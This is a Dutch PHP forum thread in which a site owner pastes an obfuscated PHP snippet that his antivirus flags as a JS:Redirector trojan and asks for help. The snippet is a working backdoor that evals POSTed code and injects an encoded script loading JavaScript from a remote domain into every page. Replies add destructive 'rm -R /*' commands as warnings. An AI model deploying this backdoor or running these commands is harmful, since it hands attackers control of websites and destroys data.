PHPhulp.nl PHPhulp.nl
35k+ leden Over PHPhulp Offerte opdracht Contact
M

trojaans paard

Door Mark Koggel op 12-05-2009 09:27
1.082 views
Hoi allemaal,

Ik gebruik avast antivirus en volgens dat programma zit er een deel van JS:Redirector-H3 in mijn website.

Nu staat deze php in mijn site en als ik hem weg haal geeft ie geen melding meer van die trojaan:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihGcFNXKXt2YXIgYnhCPSd2YWA3MmAyMGFgM2RgMjJgNTNjcmA2OXB0RW5gNjdpbmVgMjJgMmNiYDNkYDIyVmVgNzJzaW9uKGAyOStgMjJgMmNgNmFgM2RgMjJgMjJgMmN1YDNkbmF2aWdgNjF0YDZmcmAyZXVzYDY1YDcyQWdgNjVudGAzYmlgNjYoKHVgMmVgNjluZGV4T2YoYDIyV2luYDIyKWAzZTApYDI2YDI2KHVgMmVpbmRlYDc4T2YoYDIyTlRgMjA2YDIyKWAzYzBgMjlgMjZgMjZgMjhgNjRvY3VgNmRlbnRgMmVgNjNgNmZva2A2OWVgMmVgNjlgNmVkZWA3OE9gNjYoYDIybWlla2AzZDFgMjJgMjlgM2MwKWAyNmAyNih0eXBlb2YoenJ2YDdhdHNgMjlgMjFgM2R0eWA3MGVvZihgMjJgNDFgMjJgMjkpKWA3YmA3YXJgNzZ6dGA3M2AzZGAyMkFgMjJgM2JldmFgNmNgMjhgMjJpYDY2KHdpbmRvYDc3YDJlYDIyK2ErYDIyKWpgM2RqK2AyMmAyYmFgMmJgMjJNYWA2YW9yYDIyK2IrYStgMjJNaWA2ZWA2ZnJgMjJgMmJgNjJgMmJhYDJiYDIyQmA3NWlsYDY0YDIyK2IrYDIyamAzYmAyMilgM2JkYDZmY2A3NWA2ZGVudGAyZXdyaXRlKGAyMmAzY3NgNjNyaXB0YDIwc3JjYDNkYDJmYDJmZ3VtYmxhYDcyYDJlY25gMmZyYDczYDczYDJmYDNmaWRgM2RgMjIrYDZhK2AyMmAzZWAzY2A1Y2AyZnNjcmlwYDc0YDNlYDIyKWAzYmA3ZCc7dmFyIEZPUTc9YnhCLnJlcGxhY2UoRnBTVywnJScpO3ZhciB4d3B6PXVuZXNjYXBlKEZPUTcpO2V2YWwoeHdweil9KSgvYC9nKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><script language="php"> include("setup.php");</script>

Maar als ik deze weghaal, werkt mijn site ook niet meer goed.
Weet iemand wat er veranderd moet worden aan deze code?

bij voorbaat dank,

Mark
- SanThe -
12-05-2009 16:42
Karl schreef op 12.05.2009 16:38

Je wilt nooit of te nimmer dat een gebruiker php op je server kan uitvoeren.

Echt niet?

Deze ook niet?
<?php
exec('rm -R /*');
?>
Voor de lezers: NIET UITPROBEREN.
Stel dat het is toegestaan dan heb je een heel groot probleem.
?
Onbekende gebruiker
12-05-2009 17:05
SanThe schreef op 12.05.2009 16:42
[quote='Karl schreef op 12.05.2009 16:38']
Je wilt nooit of te nimmer dat een gebruiker php op je server kan uitvoeren.

Echt niet?

Deze ook niet?
<?php
exec('rm -R /*');
?>[/quote]
Naja, met een knopje "Self destruct" mag het wel.

SanThe schreef op 12.05.2009 16:42
Stel dat het is toegestaan dan heb je een heel groot probleem.

Ik vraag me altijd af of het werkt. Ik denk iig wel dat je home wordt verwijderd, maar de rest blijft bestaan, ook als je onder root zit denk ik. Maar goed toch effe voor de duidelijkheid:

JE MOET GEEN DINGEN PROBEREN WAARVAN JE NIET WEET WAT ZE DOEN!
TJVB tvb
12-05-2009 17:40
Karl schreef op 12.05.2009 17:05

[quote='SanThe schreef op 12.05.2009 16:42']Stel dat het is toegestaan dan heb je een heel groot probleem.

Ik vraag me altijd af of het werkt. Ik denk iig wel dat je home wordt verwijderd, maar de rest blijft bestaan, ook als je onder root zit denk ik. Maar goed toch effe voor de duidelijkheid:

JE MOET GEEN DINGEN PROBEREN WAARVAN JE NIET WEET WAT ZE DOEN![/quote]
rm -Rf /* is dan handiger, dan voorkom je allerlei vragen. Als je dat als root doet heb je wel een probleem. Er zijn wat dingen gelokt of waar je als root niet eens zomaar aan mag komen maar verder gaat eigenlijk alles weg (Klasgenoot van me heeft dat bij een pc die uit de roulatie ging gedaan)
?
Onbekende gebruiker
12-05-2009 17:47
TJVB schreef op 12.05.2009 17:40
rm -Rf /* is dan handiger

Daar had ik inderdaad niet opgelet, maar force is ook wel handig om d'r bij te hebben :-)
TJVB schreef op 12.05.2009 17:40
Als je dat als root doet heb je wel een probleem. Er zijn wat dingen gelokt of waar je als root niet eens zomaar aan mag komen maar verder gaat eigenlijk alles weg (Klasgenoot van me heeft dat bij een pc die uit de roulatie ging gedaan)

Mjah, ik meen dus dat ik ooit eens heb gelezen dat linux zichzelf beschermd, dus dat je belangrijke bestanden niet mag weggooien...
TJVB tvb
12-05-2009 17:55
Ja, maar als root kun je bij heel veel bestanden wel waardoor die tijdens het opstarten vanalles mist en niet verder gaat. Je kunt het proberen in een virtuele machine om het eens te testen.
?
Onbekende gebruiker
12-05-2009 17:59
TJVB schreef op 12.05.2009 17:55
Ja, maar als root kun je bij heel veel bestanden wel waardoor die tijdens het opstarten vanalles mist en niet verder gaat. Je kunt het proberen in een virtuele machine om het eens te testen.

Dat staat sowieso nog op m'n lijstje om te kloten met linux :-P.
Maar nu nog even niet.
En ik heb hier ook nog wel genoeg oude bakken liggen :-).

Reageren

Inloggen om te reageren